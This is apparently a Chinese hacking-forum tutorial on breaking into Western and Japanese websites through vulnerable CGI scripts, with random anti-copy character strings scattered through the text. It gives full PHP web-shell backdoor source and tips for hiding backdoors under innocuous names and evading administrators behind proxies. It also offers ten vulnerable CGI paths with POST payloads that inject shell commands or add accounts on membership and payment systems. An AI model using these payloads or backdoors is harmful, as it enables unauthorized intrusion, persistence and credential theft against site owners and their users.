CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
; U# T0 e' A2 [很开心来到贵论坛
- m: a1 \) M$ c这里让我感觉 很有技术交流的感觉
我会长长来玩的
/ B8 T0 C* R2 a# K- q3 E前言:
以下讲解针对欧美日本网站
當我們在做滲透分析的時候 方法有很多
我门都知道 国外伺服器大多是linux 平台
* O4 \* x& n3 z( I% S9 |所以有很多网站程序有6成都会使用cgi 脚本来管理
4 r6 |. p7 e: M; J" c5 ?6 T; \目录为/cgi-bin/

' f* o# R- y8 K3 f5 f& a只是个人在实务上一些经验
: T4 Q* d# I5 g写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
# D7 j+ V7 {* l+ b8 o讲解一下
" @. [1 y, k2 M% D让没有基础的人很容易上手
& ]4 H; @% p+ Z# M( ]3 F1 Y
2 y; }% E0 d: x' u以下内容跟帖回复才能看到
) q2 v8 v- L5 }* F+ r5 E* _==============================
0 E8 m  |1 ~* S
第1部份: 何谓Shell?
( W# `- I  \, [1 ~2 wShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
A shell is the program which reads user input from the command line and executes actions based upon that input.
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.

对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
# D# f% [$ x+ ?; k5 {0 ?所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

第2部份: Unix 指令
以下是一些常见及重要的指令:
pwd: 显示当前目录, 即是後门/程式所在的位置
5 R$ S! o+ t) E7 t- @0 @/ z8 t如 /home/www/site.com/cgi-bin/
ls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
ls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
' \* b3 v! f, x6 o- |$ x, Lls ../ -al: 详细列出上一层的资料夹及档案
! X2 ~3 |6 |+ [0 t4 ]( Gcat: 显示档案内容
) b( p% A6 [; K* [! I' d+ c* Acat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
+ J% ^" l, I9 e4 W3 ccat /etc/passwd: 显示 /etc/passwd 这个档案的内容
who: 显示谁login 至系统
6 }' ]) _' S* I1 L1 W: uman: 显示指令用法  
2 i+ U* L* O& X  \3 N7 vman ls: 显示ls这指令的用法  
mkdir 建立目录
$ B  t# J& Z# T) g" R8 v( prmdir 删除目录
mv 移动档案
rm 删除档案
  C. E6 t: ]/ ]& i2 |
  H5 C/ M' S9 c3 L, q: ~第3部份: Shell的使用
: A' C+ L* g3 I3 o* K- h% l例如:
/ X8 Z$ L7 Y- p8 i3 Ahttp://site.com/refer.php
这是我的後门, 原代码如下:
) C) ^0 P$ x9 C$ O/ y! T) A<Form Action="#" Method="POST">
( E3 b( c- [0 [8 ]$ u<Input type="text" name="cmd">
<Input type="Submit">
</Form>
  ^+ @' [2 C+ n, B$ C- b% o) g- b: x<?php
$cmd = $_POST['cmd'];
8 @& I2 V& o! P$Output = shell_exec($cmd);
echo $Output;
0 B7 ^1 l# Q+ a4 T3 y$ U+ d1 Y?>
输入pwd, 可得到绝对路径:
! I1 u) V( p, {9 W/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
% w6 d8 x( f8 y- i
& }- B& O3 W& z; m" O  {第4部份: 注意事项
* T# [7 q% ~7 s8 s- 使用匿名代理, 保障自己
! u( E# P8 z* x3 }# R! y1 N7 z- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
3 f, K  c& F* L0 }# L- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
! _5 o5 l, \  Z- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
* {6 l2 h5 c7 g6 s不容易被发现.
- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
" f) V( w' i0 `( U- s5 ]3 K9 d- W& G开始讲解脚本入侵过程:
1 J* O. ~. p- f6 ~" l; V) T& |在这里提供一些方法思路让大家学习一下
  x; k7 s6 X; i8 \! Z. N7 h0 \8 C3 [
1.一开始对一个网站进行cgi漏洞扫描
8 T% R/ g, d3 P7 T/ Z我们需要的东西有
! p$ a4 K% r' ^+ \* s' Y# A扫洞工具 如:triton..等等
; [5 O+ |9 E' m: q2 O/ e/ n# A- H2 Z/ \E表
8 u; _6 d; b3 c, q如
/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
/cgi-sys/cart.pl
, J, C5 S# g) B9 t* _/scripts/cart.pl
/htbin/cart.pl
7 I( f4 p; B. @+ ~6 j! hE表来源可以是网路收寻或是自己的0 day
3 N# I8 H# A& \
  F+ K) X. L6 j1 [$ U6 O" u! f# U2.怎样确认扫到的洞 是真的还假的?
2 `7 ~: P' ?& F举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
8 Y# ^/ [/ _$ @6 V& C% o1 ^. e0 {一般都是在IE里先看一下的,记住这个返回码哦
ERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
: W1 h# P7 R) }0 S8 X/ |8 d可以是源代码分析 找出介质
5 X; ]5 {# t  J% Z9 o! m或是用抓包工具 抓他的语法...等等
2 |7 N/ h/ g. m$ ?
以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
8 c5 _& N; T" ]9 w/index.cgi
; x- P8 a  m. Hwei=ren&gen=command
- ?" T& o) d- B/passmaster.cgi
Action=Add&Username=Username&Password=Password
/accountcreate.cgi
9 b% }. x3 p0 {0 O0 k% Vusername=username&password=password&ref1=|echo;ls|
/form.cgi
8 A: j& D. L" Pname=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
) {4 N9 x1 f/ f  S2 E! e/ccbill-local.asp
post_values=username:password
/count.cgi
pinfile=|echo;ls -la;exit|
/recon.cgi
/recon.cgi?search
9 W; m3 ^# ^- \# tsearchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
* \+ h# D5 |5 |9 A: Vvercode=username:password:dseegsow:add:amount<&30>
/af.cgi_browser_out=|echo;ls -la;exit;|
; t$ D  I6 A3 P& N
" a9 h. F# V. w8 i9 j, F2 v. n今天就讲到这  感谢大家支持